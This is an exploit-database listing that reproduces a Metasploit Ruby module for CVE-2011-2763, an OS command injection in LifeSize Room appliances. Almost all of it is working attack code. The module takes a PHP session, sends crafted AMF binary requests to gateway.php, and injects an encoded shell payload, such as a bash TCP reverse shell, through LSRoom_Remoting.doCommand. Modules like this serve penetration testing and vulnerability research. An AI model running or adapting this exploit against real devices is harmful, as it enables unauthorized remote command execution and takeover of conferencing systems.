LifeSize Room Command Injection

2011-11-01T00:00:00
ID 1337DAY-ID-16853
Type zdt
Reporter metasploit
Modified 2011-11-01T00:00:00

Description

Exploit for hardware platform in category remote exploits

                                        
                                            ##
# $Id: lifesize_room.rb 14143 2011-11-02 19:40:05Z sinn3r $
##
 
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
 
require 'msf/core'
 
class Metasploit3 < Msf::Exploit::Remote
    Rank = ExcellentRanking
 
    include Msf::Exploit::Remote::HttpClient
 
    def initialize(info = {})
        super(update_info(info,
            'Name'           => 'LifeSize Room Command Injection',
            'Description'    => %q{
                    This module exploits a vulnerable resource in LifeSize
                Room  versions 3.5.3 and 4.7.18 to inject OS commmands.  LifeSize
                Room is an appliance and thus the environment is limited
                resulting in a small set of payload options.
            },
            'Author'    =>
                [
                    # SecureState R&D Team - Special Thanks To Chris Murrey
                    'Spencer McIntyre',
                ],
            'License'        => MSF_LICENSE,
            'Version'        => '$Revision: 14143 $',
            'References'     =>
                [
                    [ 'CVE', '2011-2763' ],
                ],
            'Privileged'     => false,
            'Payload'        =>
                {
                    'DisableNops' => true,
                    'Space'       => 65535,  # limited by the two byte size in the AMF encoding
                    'Compat'      =>
                        {
                            'PayloadType' => 'cmd cmd_bash',
                            'RequiredCmd' => 'generic bash-tcp',
                        }
                },
            'Platform'       => [ 'unix' ],
            'Arch'           => ARCH_CMD,
            'Targets'        => [ [ 'Automatic', { } ] ],
            'DisclosureDate' => 'Jul 13 2011',
            'DefaultTarget'  => 0))
    end
 
    def exploit
        print_status("Requesting PHP Session...")
        res = send_request_cgi({
            'encode'    => false,
            'uri'       => "/interface/interface.php?uniqueKey=#{rand_text_numeric(13)}",
            'method'    => 'GET',
        }, 10)
 
        if not res.headers['set-cookie']
            print_error('Could Not Obtain A Session ID')
            return
        end
 
        sessionid = 'PHPSESSID=' << res.headers['set-cookie'].split('PHPSESSID=')[1].split('; ')[0]
 
        headers = {
            'Cookie'        => sessionid,
            'Content-Type'  => 'application/x-amf',
        }
 
        print_status("Validating PHP Session...")
 
        data  = "\x00\x00\x00\x00\x00\x02\x00\x1b"
        data << "LSRoom_Remoting.amfphpLogin"
        data << "\x00\x02/1\x00\x00\x00"
        data << "\x05\x0a\x00\x00\x00\x00\x00\x17"
        data << "LSRoom_Remoting.getHost"
        data << "\x00\x02\x2f\x32\x00\x00\x00\x05\x0a\x00\x00\x00\x00"
 
        res = send_request_cgi({
                'encode'    => false,
                'uri'       => '/gateway.php',
                'data'      => data,
                'method'    => 'POST',
                'headers'   => headers,
        }, 10)
 
        if not res
            print_error('Could Not Validate The Session ID')
            return
        end
 
        print_status("Sending Malicious POST Request...")
 
        # This is the amf data for the request to the vulnerable function LSRoom_Remoting.doCommand
        amf_data =  "\x00\x00\x00\x00\x00\x01\x00\x19"
        amf_data << "LSRoom_Remoting.doCommand"
        amf_data << "\x00\x02\x2f\x37\xff\xff\xff\xff"
        amf_data << "\x0a\x00\x00\x00\x02\x02#{[payload.encoded.length].pack('n')}#{payload.encoded}"
        amf_data << "\x02\x00\x0dupgradeStatus"
 
        res = send_request_cgi({
                'encode'    => false,
                'uri'       => '/gateway.php?' << sessionid,
                'data'      => amf_data,
                'method'    => 'POST',
                'headers'   => headers
        }, 10)
    end
 
end



#  0day.today [2018-01-04]  #